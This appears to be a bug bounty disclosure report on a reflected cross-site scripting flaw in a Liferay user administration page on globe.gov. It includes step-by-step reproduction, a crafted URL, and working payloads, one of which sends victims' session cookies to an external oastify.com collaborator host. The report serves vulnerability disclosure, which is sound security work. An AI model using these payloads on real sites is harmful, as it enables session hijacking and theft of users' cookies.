Summary by Zer0_bugs
Reflected Cross-Site Scripting (Non-self)
Overview of the Vulnerability
Reflected Cross-Site Scripting (XSS) is a type of injection attack where malicious JavaScript code is injected into a website. When a user visits the affected web page, the JavaScript code executes and its input is reflected in the user's browser. Reflected XSS can be found on this domain which allows an attacker to create a crafted URL which when opened by a user will execute arbitrary Javascript within that user's browser in the context of this domain.
When an attacker can control code that is executed within a user’s browser, they are able to carry out any actions that the user is able to perform, including accessing any of the user's data and modifying information within the user’s permissions. This can result in modification, deletion, or theft of data, including accessing or deleting files, or stealing session cookies which an attacker could use to hijack a user’s session.
Business Impact
Reflected XSS could lead to data theft through the attacker’s ability to manipulate data through their access to the application, and their ability to interact with other users, including performing other malicious attacks, which would appear to originate from a legitimate user. These malicious actions could also result in reputational damage for the business through the impact to customers trust.
Steps to Reproduce
Go to vulnerable url: https://www.globe.gov/group/control_panel/manage?_com_liferay_users_admin_web_portlet_UsersAdminPortlet_keywords=vulnerable+url&p_p_mode=view&p_p_lifecycle=0&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_toolbarItem=view-all-users&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_orderByType=asc&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_status=0&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_keywords=hello&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_usersListView=flat-users&p_p_state=maximized&p_p_id=com_liferay_users_admin_web_portlet_UsersAdminPortlet&refererPlid=70817193&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_navigation=active&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_saveUsersListView=true&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_orderByCol=firstName&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_userGroupId=332470 ( Attacker should be logged in to his account )
Now after visiting the url , add given payload in the url section Payload: hello"</span></span></div></li></ul></nav><body src=https://burpcolab_link onload=this+alert(document.cookie)>
Mentioned payload can help us to steal victim's cookies.
The final URL looks like this https://www.globe.gov/group/control_panel/manage?_com_liferay_users_admin_web_portlet_UsersAdminPortlet_keywords=hello%22%3C%2Fspan%3E%3C%2Fspan%3E%3C%2Fdiv%3E%3C%2Fli%3E%3C%2Ful%3E%3C%2Fnav%3E%3Cbody+src%3Dhttps%3A%2F%2Fjcz1qduie3i7dryvdjw28uuwbnhe56tv.oastify.com+onload%3Dthis%2Balert%28document.cookie%29%3E&p_p_mode=view&p_p_lifecycle=0&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_toolbarItem=view-all-users&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_orderByType=asc&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_status=0&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_keywords=hello&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_usersListView=flat-users&p_p_state=maximized&p_p_id=com_liferay_users_admin_web_portlet_UsersAdminPortlet&refererPlid=70817193&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_navigation=active&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_saveUsersListView=true&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_orderByCol=firstName&_com_liferay_users_admin_web_portlet_UsersAdminPortlet_userGroupId=332470
Send it to the victim (This payload only works if the victim has an account in their opened browser.)
And the payload gets executed in the victim's browser, and the victim's cookies will also leak into attackers burp suite.
Observe the JavaScript payload being executed
Proof of Concept (PoC)
Below is a screenshot demonstrating the injected JavaScript executing at the vulnerable endpoint:
Normal payload:
image-2024-03-08T18:34:52.268Z.png
_Payload: _hello"</span></span></div></li></ul></nav><script> alert('REFLECTED XSS FOUND')</script>
Payload_to_steal_cookies:
image-2024-03-08T18:32:31.015Z.png
This XSS vulnerability could be further abused by using the following JavaScript payload:
hello"</span></span></div></li></ul></nav><script> alert(document.cookie); var i=new Image; i.src="https://yjlgxs1xlipmk65aky3hf91bi2otcm0b.oastify.com/?"+document.cookie; </script>
Here is a screenshot of the full exploit taking place:
image-2024-03-08T18:45:09.813Z.png
Successfully able to capture victim's cookies using burp suite